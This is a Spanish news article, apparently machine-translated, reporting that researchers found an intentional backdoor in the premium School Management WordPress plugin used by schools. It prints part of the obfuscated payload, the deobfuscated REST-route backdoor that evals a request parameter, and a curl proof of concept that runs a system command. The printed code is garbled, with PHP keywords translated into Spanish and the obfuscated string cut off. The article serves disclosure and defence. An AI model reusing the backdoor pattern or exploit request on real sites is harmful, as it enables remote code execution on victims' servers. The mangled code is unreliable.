Los investigadores encuentran una puerta trasera en un complemento de WordPress utilizado por las escuelas

Los investigadores dijeron el viernes que encontraron una puerta trasera maliciosa en un complemento de WordPress que les dio a los atacantes control total sobre los sitios web que usan el paquete, que se comercializa en las escuelas. La versión premium de School Management, un complemento que las escuelas usan para ejecutar y administrar sus sitios web, ha incluido la puerta trasera desde al menos la versión 8.9, dijeron los investigadores del servicio de seguridad de sitios web JetPack en una publicación de blog, sin descartar que estaba presente en versiones anteriores. versiones. Esta página de un sitio de terceros muestra que la versión 8.9 se lanzó en agosto pasado.

puerta trasera obvia

Jetpack dijo que descubrió la puerta trasera después de que los miembros del equipo de soporte de WordPress.com informaron haber encontrado un código muy ofuscado en varios sitios web que usaban School Management Pro. Después de desofuscarlo, descubrieron que el código oculto en la parte de verificación de licencia del complemento se colocó allí intencionalmente para permitir que personas externas tomaran el control de los sitios web. «El código en sí no es tan interesante: es una puerta trasera obvia inyectada en el código de verificación de la licencia del complemento», se lee en la publicación de JetPack. «Permite que cualquier atacante ejecute código PHP arbitrario en la página donde está instalado el complemento». x7a).chr($_x = 0x70 – 7).chr($_x += 5).chr($_x -= 8) .»\x6c\x61\x74″ . «\x65\x28\x62 «.» \x61\x73\x65\x36″.»\x34\x5f\x64\x65 \x63\x6f\x64\x65\x28’fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i //I303OsGfjoLO2Pzm13JjuMfw6SQS /m304Bs=»» str_repeat(chr(0x29), 3).»\x3b «); class WLSM_Crypt_Blowfish_DefaultKey Después de desofuscar, el código era: add_action( «rest_api_init’, function() { register_rest_route( ‘am-member’, ‘license’, array( ‘methods’ => WP_REST_Server::CREATABLE, ‘callback’ = > function( $solicitud) { $argumentos = $solicitud->get_params(); if ( isset( $argumentos[‘blowfish’] ) && ! vacío ($ argumentos[‘blowfish’] ) && isset( $argumentos[‘blowf’] ) && ! vacío ($ argumentos[‘blowf’] ) ) { evaluación ($argumentos[‘blowf’] ); } }, ) ); }); Los investigadores escribieron un exploit de prueba de concepto que confirmó que el código ofuscado era de hecho una puerta trasera, lo que permitía a cualquiera que lo supiera ejecutar el código de su elección en cualquier sitio web que ejecutara el complemento. $ curl -s -d ‘blowfish=1’ -d «blowf=system(‘id’);» ‘http://localhost:8888/wp-json/am-member/license’ uid=33(www-data) gid=33(www-data) groups=33(www-data) Advertencia: la información del encabezado no se puede cambiar – encabezado ya enviado por (salida iniciada en /var/www/html/wp-content/plugins/school-management-pro-9.9.4/admin/inc/manager/WLSM_LC.php(683) : eval() ‘d código (1): eval()’d código(9): eval()’d código:1) en /var/www/html/wp-includes/rest-api/class-wp-rest-server.php en línea 1713

el secreto permanece

No está claro cuántos sitios web usan el complemento. Weblizar, el fabricante de School Management con sede en India, dice en su página de inicio que tiene «340,000+» clientes para sus temas y complementos gratuitos y premium, pero la puerta trasera que encontró JetPack solo estaba en School Management Pro. La puerta trasera no se incluyó en la versión gratuita del complemento y no hay indicios de que se haya integrado en otros complementos lanzados por Weblizar. «Tratamos de obtener más información del proveedor sobre cuándo se inyectó la puerta trasera, qué versiones se ven afectadas y cómo el código ingresó al complemento en primer lugar», se lee en la publicación. “Esos esfuerzos no tuvieron éxito ya que el proveedor dice que no sabe cuándo o cómo el código entró en su software.” Los intentos de comunicarse con Weblizar no tuvieron éxito. Ahora que la existencia de la puerta trasera es de conocimiento público, es probable que los atacantes puedan explotarla en cualquier sitio web utilizando una versión vulnerable del complemento. Cualquiera que use este complemento debe actualizar de inmediato. Incluso después de parchear, deben escanear cuidadosamente su sitio web en busca de signos de compromiso, ya que es posible que la actualización no elimine las puertas traseras recién agregadas.

Deja una respuesta

Tu dirección de correo electrónico no será publicada.